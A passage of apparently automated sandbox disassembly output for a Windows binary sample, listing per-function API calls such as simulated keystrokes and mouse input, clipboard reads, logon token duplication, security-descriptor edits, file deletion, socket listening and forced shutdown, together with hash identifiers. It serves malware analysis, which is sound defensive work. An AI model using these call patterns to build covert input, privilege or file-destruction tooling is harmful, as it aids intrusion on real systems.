                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F4F6
                        • keybd_event.USER32(00000012,00000000), ref: 0038F501
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F50B
                        • keybd_event.USER32(00000012,00000000), ref: 0038F510
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F519
                        • keybd_event.USER32(00000012,00000000), ref: 0038F51E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F528
                        • keybd_event.USER32(00000012,00000000), ref: 0038F52D
                        • SetForegroundWindow.USER32(00000000), ref: 0038F530
                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0038F557
                        Strings
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                        • Instruction ID: c1d1e841566c22dbec90070190faa570de5ddaa237eebe1dddbc9bcbce59ce55
                        • Opcode Fuzzy Hash: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
                        • Instruction Fuzzy Hash: C531A671A50318BFEB226BB64C4AFBF7E6CEB45B50F151066F604E61D1C7B06D00AB60
                        APIs
                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00391286
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003912A8
                        • CloseHandle.KERNEL32(?), ref: 003912B9
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003912D1
                        • GetProcessWindowStation.USER32 ref: 003912EA
                        • SetProcessWindowStation.USER32(00000000), ref: 003912F4
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00391310
                          • Part of subcall function 003910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
                          • Part of subcall function 003910BF: CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                        Strings
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                        • String ID: $default$winsta0$Z?
                        • API String ID: 22674027-1168915105
                        • Opcode ID: d0c71834102cefe1758d7a3082ba2f424522eb4ff9f9da16466b5e1af0ef0c46
                        • Instruction ID: 1c43c8cd50b94dfa47795b87a2dd47e63585fc2eec4c31ef8b3326d562d0d6bb
                        • Opcode Fuzzy Hash: d0c71834102cefe1758d7a3082ba2f424522eb4ff9f9da16466b5e1af0ef0c46
                        • Instruction Fuzzy Hash: 2F818B7190020AAFEF229FA5DC49FEE7BB9EF08704F184129FA14F61A0C7319954CB20
                        APIs
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390BCC
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390C00
                        • GetLengthSid.ADVAPI32(?), ref: 00390C17
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390C51
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390C6D
                        • GetLengthSid.ADVAPI32(?), ref: 00390C84
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390C8C
                        • HeapAlloc.KERNEL32(00000000), ref: 00390C93
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390CB4
                        • CopySid.ADVAPI32(00000000), ref: 00390CBB
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390CEA
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390D0C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390D1E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D45
                        • HeapFree.KERNEL32(00000000), ref: 00390D4C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D55
                        • HeapFree.KERNEL32(00000000), ref: 00390D5C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D65
                        • HeapFree.KERNEL32(00000000), ref: 00390D6C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390D78
                        • HeapFree.KERNEL32(00000000), ref: 00390D7F
                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                        • Instruction ID: 9124ea8c7de129564b17392fe9250bcfef17763c0f886c2ed4d6ad8d3d73d61a
                        • Opcode Fuzzy Hash: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                        • Instruction Fuzzy Hash: 2771587290021AAFDF16DFA5DC48FAEBBBCBF04304F054615E919E6291D771EA05CBA0
                        APIs
                        • OpenClipboard.USER32(003CCC08), ref: 003AEB29
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003AEB37
                        • GetClipboardData.USER32(0000000D), ref: 003AEB43
                        • CloseClipboard.USER32 ref: 003AEB4F
                        • GlobalLock.KERNEL32(00000000), ref: 003AEB87
                        • CloseClipboard.USER32 ref: 003AEB91
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 003AEBBC
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 003AEBC9
                        • GetClipboardData.USER32(00000001), ref: 003AEBD1
                        • GlobalLock.KERNEL32(00000000), ref: 003AEBE2
                        • GlobalUnlock.KERNEL32(00000000,?), ref: 003AEC22
                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 003AEC38
                        • GetClipboardData.USER32(0000000F), ref: 003AEC44
                        • GlobalLock.KERNEL32(00000000), ref: 003AEC55
                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003AEC77
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AEC94
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AECD2
                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 003AECF3
                        • CountClipboardFormats.USER32 ref: 003AED14
                        • CloseClipboard.USER32 ref: 003AED59
                        Similarity
                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                        • String ID:
                        • API String ID: 420908878-0
                        • Opcode ID: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                        • Instruction ID: bab2532d7984057a3522fbec8864975af97964e1b534fa44c0b70d3eb5d37218
                        • Opcode Fuzzy Hash: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                        • Instruction Fuzzy Hash: 7D61F435208301AFD302EF24D899F2AB7A8EF85714F09555DF45ADB2A1CB31ED06CB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A69BE
                        • FindClose.KERNEL32(00000000), ref: 003A6A12
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A4E
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A75
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6AB2
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6ADF
                        Strings
                        Similarity
                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                        • API String ID: 3830820486-3289030164
                        • Opcode ID: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                        • Instruction ID: 8a57dee008a88b93b18a58b5d539707f4d384203e835906b37b0f6105918e19f
                        • Opcode Fuzzy Hash: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                        • Instruction Fuzzy Hash: 91D160B2508300AFC715EBA4C986EABB7ECEF89704F04491DF585DB191EB74DA44CB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003A9663
                        • GetFileAttributesW.KERNEL32(?), ref: 003A96A1
                        • SetFileAttributesW.KERNEL32(?,?), ref: 003A96BB
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A96D3
                        • FindClose.KERNEL32(00000000), ref: 003A96DE
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A96FA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A974A
                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A9768
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A9772
                        • FindClose.KERNEL32(00000000), ref: 003A977F
                        • FindClose.KERNEL32(00000000), ref: 003A978F
                        Strings
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                        • Instruction ID: 7b63f622de64c7e50bc6dc2d29264e7d833c5ece09189830cdfc39f2a16236f9
                        • Opcode Fuzzy Hash: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                        • Instruction Fuzzy Hash: 4A31B0325002196ADF16AFB5EC09FEE77ACDF4A321F114596E909E21A0DB35ED448B20
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003A97BE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A9819
                        • FindClose.KERNEL32(00000000), ref: 003A9824
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A9840
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A9890
                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A98AE
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A98B8
                        • FindClose.KERNEL32(00000000), ref: 003A98C5
                        • FindClose.KERNEL32(00000000), ref: 003A98D5
                          • Part of subcall function 0039DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0039DB00
                        Strings
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        • Opcode ID: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                        • Instruction ID: cccf64afb31ad269354f530ffca349d700e7cf254e0a6db0ad1df614fd45c08a
                        • Opcode Fuzzy Hash: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                        • Instruction Fuzzy Hash: 0E31B0325002196ADF12EFA4EC49FEE77ACDF07320F118556E914F21A0DB39EE458B20
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 003A8257
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A8267
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A8273
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A8310
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8324
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8356
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A838C
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8395
                        Strings
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local$System
                        • String ID: *.*
                        • API String ID: 1464919966-438819550
                        • Opcode ID: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                        • Instruction ID: 7a1f713e16fdd48fdac93cb5a6bcedcfec8d0a3e69484e1e922ee2bec63d56a8
                        • Opcode Fuzzy Hash: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                        • Instruction Fuzzy Hash: 10615A765043459FDB11EF60C880AAEB3E8FF8A310F048D1AF989DB251DB35E945CB92
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D122
                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0039D1DD
                        • MoveFileW.KERNEL32(?,?), ref: 0039D1F0
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D20D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D237
                          • Part of subcall function 0039D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0039D21C,?,?), ref: 0039D2B2
                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0039D253
                        • FindClose.KERNEL32(00000000), ref: 0039D264
                        Strings
                        Similarity
                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 1946585618-1173974218
                        • Opcode ID: a72b7b313e5d03cdeb49c638c351b6c1ede21ee7fa5f433b4a56d87b91f07473
                        • Instruction ID: fb75530b5c2a28def164653b4b8f5fdc007a45c2f66707c4c21e9511a569e8f8
                        • Opcode Fuzzy Hash: a72b7b313e5d03cdeb49c638c351b6c1ede21ee7fa5f433b4a56d87b91f07473
                        • Instruction Fuzzy Hash: 4D615F3180510D9FCF07EBE0DA929EDB779AF55300F248565E4467B191EB31AF09CB60
                        APIs
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                        • Instruction ID: 2f911999940646a056ec68223d75a779070f3f79345b436ed397cd3acd153cf4
                        • Opcode Fuzzy Hash: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                        • Instruction Fuzzy Hash: 2341AB35204611AFE722CF15D888F19BBE9EF45329F19D099E8199FA62C735FC42CB90
                        APIs
                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                        • ExitWindowsEx.USER32(?,00000000), ref: 0039E932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $ $@$SeShutdownPrivilege
                        • API String ID: 2234035333-3163812486
                        • Opcode ID: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                        • Instruction ID: c2e17d0c84c03e6f0a958fae112cc67095678395240af6d6fb6edc9edea87847
                        • Opcode Fuzzy Hash: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                        • Instruction Fuzzy Hash: D601F973A20215AFEF56B6B49C86FBF726CA714751F150821FD13F61D1DBA96C408290
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B1276
                        • WSAGetLastError.WSOCK32 ref: 003B1283
                        • bind.WSOCK32(00000000,?,00000010), ref: 003B12BA
                        • WSAGetLastError.WSOCK32 ref: 003B12C5
                        • closesocket.WSOCK32(00000000), ref: 003B12F4
                        • listen.WSOCK32(00000000,00000005), ref: 003B1303
                        • WSAGetLastError.WSOCK32 ref: 003B130D
                        • closesocket.WSOCK32(00000000), ref: 003B133C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                        • Instruction ID: 66726eae312b8e71625800625603e258c26f4c849bff496a15be40cf504bd067
                        • Opcode Fuzzy Hash: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                        • Instruction Fuzzy Hash: 0941D435A002009FD711DF24C494B6ABBE5BF46318F598488D95A8F6D2C731FD81CBE0
                        APIs
                        • _free.LIBCMT ref: 0036B9D4
                        • _free.LIBCMT ref: 0036B9F8
                        • _free.LIBCMT ref: 0036BB7F
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                        • _free.LIBCMT ref: 0036BD4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                        • Instruction ID: 93602a0bea8ee5e86e0f824aa792dc619ab007b02ca1772f9a0e9c002e708588
                        • Opcode Fuzzy Hash: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                        • Instruction Fuzzy Hash: C1C11975A042049FCB279F78CC41AAAFBB9EF41350F15C1AAE495EB259D7309E81CF50
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D420
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D470
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D481
                        • FindClose.KERNEL32(00000000), ref: 0039D498
                        • FindClose.KERNEL32(00000000), ref: 0039D4A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        • API String ID: 2649000838-1173974218
                        • Opcode ID: 65ba0c05958b0722b693fef3193c5e8659e3fd360cf5c40391449e565d2303fc
                        • Instruction ID: 47fe3c2c6fe5f99d8a10ac63505c0d2bd1de4f84176df40e26c57f1fd1c1ce0d
                        • Opcode Fuzzy Hash: 65ba0c05958b0722b693fef3193c5e8659e3fd360cf5c40391449e565d2303fc
                        • Instruction Fuzzy Hash: D8315C710183459BC706EF64D8929AFB7A8AE91314F448E1DF4D5971A1EF20AA09CB63
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                        • Instruction ID: f2b65f6e36d824acd251a2a20ae2c2d3b77a74e2328c6943c19d0429e7595902
                        • Opcode Fuzzy Hash: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                        • Instruction Fuzzy Hash: E9C26E75E086288FDB26CF28DD407EAB7B9EB45305F1581EAD80DE7244E774AE858F40
                        APIs
                        • _wcslen.LIBCMT ref: 003A64DC
                        • CoInitialize.OLE32(00000000), ref: 003A6639
                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A6650
                        • CoUninitialize.OLE32 ref: 003A68D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                        • Instruction ID: b49147b49d17ee3740a5433d712a262a59f0d61253e5a4e18755aaab5e295825
                        • Opcode Fuzzy Hash: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                        • Instruction Fuzzy Hash: 2CD13971508201AFD315EF24C882E6BB7E9FF95704F04496DF5958B2A1EB70ED05CB92
                        APIs
                        • GetForegroundWindow.USER32(?,?,00000000), ref: 003B22E8
                          • Part of subcall function 003AE4EC: GetWindowRect.USER32(?,?), ref: 003AE504
                        • GetDesktopWindow.USER32 ref: 003B2312
                        • GetWindowRect.USER32(00000000), ref: 003B2319
                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003B2355
                        • GetCursorPos.USER32(?), ref: 003B2381
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B23DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                        • String ID:
                        • API String ID: 2387181109-0
                        • Opcode ID: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                        • Instruction ID: 624582774cf13172e0cd514bc8b7ffadd59e6790915dbb90eed1a0d585b9e2d0
                        • Opcode Fuzzy Hash: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                        • Instruction Fuzzy Hash: 7431BE72504315ABDB22DF55C849E9BB7E9FB88314F000A19F989D7191DB34E909CB92
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003A9B78
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003A9C8B
                          • Part of subcall function 003A3874: GetInputState.USER32 ref: 003A38CB
                          • Part of subcall function 003A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003A9BA8
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003A9C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                        • String ID: *.*
                        • API String ID: 1972594611-438819550
                        • Opcode ID: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                        • Instruction ID: e59ffa90888ece704b0d1197acc1cf245ffa9a5c0ea0056709b0b4e8e961b92b
                        • Opcode Fuzzy Hash: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                        • Instruction Fuzzy Hash: 9441307194460A9FCF16DFA4C985BEEBBB8EF06311F248156E905B6191EB309E44CF60
                        APIs
